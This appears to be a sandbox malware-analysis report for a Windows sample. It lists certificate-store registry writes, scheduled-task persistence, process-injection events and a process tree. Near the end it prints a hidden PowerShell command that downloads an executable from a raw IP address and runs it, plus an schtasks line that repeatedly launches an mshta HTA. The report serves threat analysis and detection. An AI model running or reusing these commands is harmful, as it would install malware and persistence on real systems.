305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	41e4355916.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	41e4355916.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	41e4355916.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	41e4355916.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	d50bc265d4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	d50bc265d4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	41e4355916.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	41e4355916.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	41e4355916.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2436	schtasks.exe
2900	schtasks.exe
1448	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1972	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
2432	skotes.exe
1016	powershell.exe
1016	powershell.exe
1016	powershell.exe
572	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
1540	powershell.exe
896	powershell.exe
788	powershell.exe
2356	powershell.exe
572	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
572	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
2356	powershell.exe
2356	powershell.exe
588	483d2fa8a0d53818306efeb32d3.exe
2784	41e4355916.exe
1696	f51a7aa350.exe
2784	41e4355916.exe
2784	41e4355916.exe
2784	41e4355916.exe
2784	41e4355916.exe
2896	44720c9602.exe
2968	7c18fb7ceb.exe
2896	44720c9602.exe
2896	44720c9602.exe
2700	a60165c390.exe
2700	a60165c390.exe
1112	d50bc265d4.exe
1900	ftS1RPn.exe
2228	094249b63a.exe
1828	6f32fb5c60.exe
2228	094249b63a.exe
2228	094249b63a.exe
2228	094249b63a.exe
2228	094249b63a.exe
1608	8ee8d5c43d.exe
2944	powershell.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
2944	powershell.exe
2944	powershell.exe
2944	powershell.exe
3592	TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE
3592	TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE
3816	964beb63e8.exe
3816	964beb63e8.exe
4016	ftS1RPn.exe
4016	ftS1RPn.exe
3564	ebp51gY.exe
3564	ebp51gY.exe
3216	DTQCxXZ.exe
3216	DTQCxXZ.exe
3216	DTQCxXZ.exe
3216	DTQCxXZ.exe
3564	ebp51gY.exe
3564	ebp51gY.exe
3564	ebp51gY.exe
3564	ebp51gY.exe
3768	1c378480ff.exe
3768	1c378480ff.exe
1252	bf1e1b38e9.exe
1252	bf1e1b38e9.exe
3768	1c378480ff.exe
3768	1c378480ff.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	788	powershell.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	572	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Token: SeDebugPrivilege	2896	44720c9602.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1344	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	1520	taskkill.exe
Token: SeDebugPrivilege	2436	taskkill.exe
Token: SeDebugPrivilege	2084	firefox.exe
Token: SeDebugPrivilege	2084	firefox.exe
Token: SeDebugPrivilege	2944	powershell.exe

Suspicious use of FindShellTrayWindow 22 IoCs

pid	Process
1972	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
560	075b91d2c5.exe
560	075b91d2c5.exe
560	075b91d2c5.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
2084	firefox.exe
2084	firefox.exe
2084	firefox.exe
2084	firefox.exe
1608	8ee8d5c43d.exe
2784	7584b57e33.exe
2784	7584b57e33.exe
2784	7584b57e33.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
560	075b91d2c5.exe
560	075b91d2c5.exe
560	075b91d2c5.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
2084	firefox.exe
2084	firefox.exe
2084	firefox.exe
1608	8ee8d5c43d.exe
2784	7584b57e33.exe
2784	7584b57e33.exe
2784	7584b57e33.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe
1608	8ee8d5c43d.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1972 wrote to memory of 2432	1972	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe	30
PID 1972 wrote to memory of 2432	1972	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe	30
PID 1972 wrote to memory of 2432	1972	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe	30
PID 1972 wrote to memory of 2432	1972	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe	30
PID 2432 wrote to memory of 560	2432	skotes.exe	33
PID 2432 wrote to memory of 560	2432	skotes.exe	33
PID 2432 wrote to memory of 560	2432	skotes.exe	33
PID 2432 wrote to memory of 560	2432	skotes.exe	33
PID 560 wrote to memory of 1980	560	075b91d2c5.exe	34
PID 560 wrote to memory of 1980	560	075b91d2c5.exe	34
PID 560 wrote to memory of 1980	560	075b91d2c5.exe	34
PID 560 wrote to memory of 1980	560	075b91d2c5.exe	34
PID 560 wrote to memory of 2496	560	075b91d2c5.exe	36
PID 560 wrote to memory of 2496	560	075b91d2c5.exe	36
PID 560 wrote to memory of 2496	560	075b91d2c5.exe	36
PID 560 wrote to memory of 2496	560	075b91d2c5.exe	36
PID 1980 wrote to memory of 1448	1980	cmd.exe	37
PID 1980 wrote to memory of 1448	1980	cmd.exe	37
PID 1980 wrote to memory of 1448	1980	cmd.exe	37
PID 1980 wrote to memory of 1448	1980	cmd.exe	37
PID 2496 wrote to memory of 1016	2496	mshta.exe	38
PID 2496 wrote to memory of 1016	2496	mshta.exe	38
PID 2496 wrote to memory of 1016	2496	mshta.exe	38
PID 2496 wrote to memory of 1016	2496	mshta.exe	38
PID 2432 wrote to memory of 2156	2432	skotes.exe	40
PID 2432 wrote to memory of 2156	2432	skotes.exe	40
PID 2432 wrote to memory of 2156	2432	skotes.exe	40
PID 2432 wrote to memory of 2156	2432	skotes.exe	40
PID 2156 wrote to memory of 1868	2156	cmd.exe	42
PID 2156 wrote to memory of 1868	2156	cmd.exe	42
PID 2156 wrote to memory of 1868	2156	cmd.exe	42
PID 2156 wrote to memory of 1868	2156	cmd.exe	42
PID 1868 wrote to memory of 2856	1868	cmd.exe	44
PID 1868 wrote to memory of 2856	1868	cmd.exe	44
PID 1868 wrote to memory of 2856	1868	cmd.exe	44
PID 1868 wrote to memory of 2856	1868	cmd.exe	44
PID 1016 wrote to memory of 572	1016	powershell.exe	45
PID 1016 wrote to memory of 572	1016	powershell.exe	45
PID 1016 wrote to memory of 572	1016	powershell.exe	45
PID 1016 wrote to memory of 572	1016	powershell.exe	45
PID 1868 wrote to memory of 1276	1868	cmd.exe	46
PID 1868 wrote to memory of 1276	1868	cmd.exe	46
PID 1868 wrote to memory of 1276	1868	cmd.exe	46
PID 1868 wrote to memory of 1276	1868	cmd.exe	46
PID 1276 wrote to memory of 1540	1276	cmd.exe	47
PID 1276 wrote to memory of 1540	1276	cmd.exe	47
PID 1276 wrote to memory of 1540	1276	cmd.exe	47
PID 1276 wrote to memory of 1540	1276	cmd.exe	47
PID 1868 wrote to memory of 1928	1868	cmd.exe	48
PID 1868 wrote to memory of 1928	1868	cmd.exe	48
PID 1868 wrote to memory of 1928	1868	cmd.exe	48
PID 1868 wrote to memory of 1928	1868	cmd.exe	48
PID 1928 wrote to memory of 896	1928	cmd.exe	49
PID 1928 wrote to memory of 896	1928	cmd.exe	49
PID 1928 wrote to memory of 896	1928	cmd.exe	49
PID 1928 wrote to memory of 896	1928	cmd.exe	49
PID 1868 wrote to memory of 2372	1868	cmd.exe	50
PID 1868 wrote to memory of 2372	1868	cmd.exe	50
PID 1868 wrote to memory of 2372	1868	cmd.exe	50
PID 1868 wrote to memory of 2372	1868	cmd.exe	50
PID 2372 wrote to memory of 788	2372	cmd.exe	51
PID 2372 wrote to memory of 788	2372	cmd.exe	51
PID 2372 wrote to memory of 788	2372	cmd.exe	51
PID 2372 wrote to memory of 788	2372	cmd.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
"C:\Users\Admin\AppData\Local\Temp\1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Users\Admin\AppData\Local\Temp\1090449101\075b91d2c5.exe
    "C:\Users\Admin\AppData\Local\Temp\1090449101\075b91d2c5.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn Y0N8kmardJW /tr "mshta C:\Users\Admin\AppData\Local\Temp\ar4SyxrP3.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1980
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn Y0N8kmardJW /tr "mshta C:\Users\Admin\AppData\Local\Temp\ar4SyxrP3.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1448
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\ar4SyxrP3.hta
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:2496
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1016
      - C:\Users\Admin\AppData\Local\TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
        
        "C:\Users\Admin\AppData\Local\TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
